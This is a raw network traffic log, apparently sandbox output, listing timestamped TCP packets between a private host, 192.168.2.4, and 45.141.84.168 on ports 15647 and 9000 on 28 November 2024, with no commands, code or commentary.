                                          Nov 28, 2024 13:40:32.496623993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.496637106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.496682882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.504667997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.504750967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.511533022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.511611938 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.511701107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.529412031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.529562950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.532175064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.532238960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.542081118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.542095900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.542146921 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.555396080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.555465937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.560276985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.561325073 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.566137075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.566265106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.576536894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.576601028 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.582185030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.582204103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.582293034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.590473890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.595453024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.608381033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.608393908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.608525038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.618889093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.620366096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.621143103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.621263027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.621268988 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.627788067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.629349947 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.643037081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.648468971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.648581982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.648679018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.653630972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.654181957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.654691935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.654743910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.654829979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.654872894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.660895109 CET90004984645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.661015987 CET90004984645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.661092043 CET498469000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.661163092 CET498469000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.667769909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.672916889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.674355030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.676013947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.676228046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.686258078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.688517094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.690232992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.690248966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.690334082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.703002930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.704459906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.711414099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.711823940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.724347115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.729927063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.730037928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.730120897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.732145071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.732206106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.741225958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.741831064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.741878033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.744808912 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.760387897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.761019945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.761040926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.761120081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.763106108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.764373064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.766982079 CET498529000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.768482924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.770361900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.774852037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.776393890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.781056881 CET90004984645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.782386065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.782980919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.787853956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.788429976 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.790761948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.792115927 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.796430111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.797347069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.809540033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.809607983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.809734106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.820295095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.821338892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.831944942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.832014084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.834609985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.835880041 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.844410896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.845246077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.852193117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.854351997 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.864819050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.864881039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.877152920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.877177000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.877212048 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.877248049 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.880534887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.880606890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.882648945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.884047985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.886970043 CET90004985245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.887053013 CET498529000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.887161016 CET498529000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.890414000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.892195940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.897954941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.898015976 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.908529043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.910897970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.910974026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.911001921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.917567968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.931083918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.931183100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.933448076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.933540106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.933583975 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.947665930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.950728893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.950958014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.951035023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.956293106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.956377983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.964544058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.964569092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.964656115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.969989061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.970873117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.984903097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.986403942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.989329100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.989342928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.989362955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.989418030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.996464968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.998130083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.999460936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.001373053 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.008708954 CET90004985245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.010087013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.010341883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.018704891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.022344112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.026242018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.028383970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.043203115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.051644087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.051696062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.065215111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.067868948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.068507910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.071166039 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.071235895 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.081293106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.081399918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.081506014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.090997934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.091511011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.097656012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.097747087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.097800016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.105235100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.105432034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.109725952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.110045910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.121351957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.121927023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.131383896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.131513119 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.134556055 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.134624958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.134681940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.147809982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.147913933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.148042917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.163326979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.163419008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.165811062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.165947914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.165997982 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.177238941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.177723885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.187880039 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.187952995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.187964916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.187999010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.188076973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.188323975 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.190192938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.190268040 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.200912952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.200961113 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.200972080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.211589098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.212723017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.214859962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.214927912 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.226097107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.228537083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.232567072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.232589006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.232650995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.246500969 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.246680021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.246768951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.254790068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.256635904 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.269789934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.269978046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.270059109 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.275362968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.275388002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.275470018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.282383919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.284508944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.285912991 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.285969019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.292315960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.292625904 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.306220055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.306648970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.306731939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.306801081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.310996056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.312413931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.320040941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.320214987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.320291996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.332215071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.332391024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.334893942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.334964037 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.335906982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.336172104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.348819971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.350135088 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.366724014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.367115021 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.373158932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.373267889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.373333931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.388343096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.389041901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.389344931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.391530037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.391730070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.402998924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.403165102 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.403256893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.406776905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.408612013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.419857025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.419871092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.419938087 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.426405907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.427581072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.427665949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.440361023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.442336082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.443300962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.443423986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.452857971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.453285933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.456182003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.456372976 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.469558954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.469625950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.470346928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.472088099 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.481822968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.481911898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.481952906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.487150908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.487256050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.499164104 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.499295950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.503739119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.503818989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.503827095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.508423090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.510117054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.510201931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.523268938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.523430109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.523464918 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.523487091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.534297943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.534399986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.534435034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.547699928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.548486948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.549918890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.549998045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.554290056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.554311037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.554363966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.563404083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.564460039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.568057060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.568145990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.576472998 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.577939987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.578186035 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.591382980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.591608047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.591708899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.597752094 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.600394011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.607093096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.608485937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.619868994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.627798080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.628374100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.633677006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.636729956 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.650564909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.653428078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.653544903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.653628111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.669523954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.670994997 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.671538115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.671612978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.671680927 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.683027983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.683198929 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.688119888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:33.688508987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:33.694658995 CET156474973045.141.84.168192.168.2.4
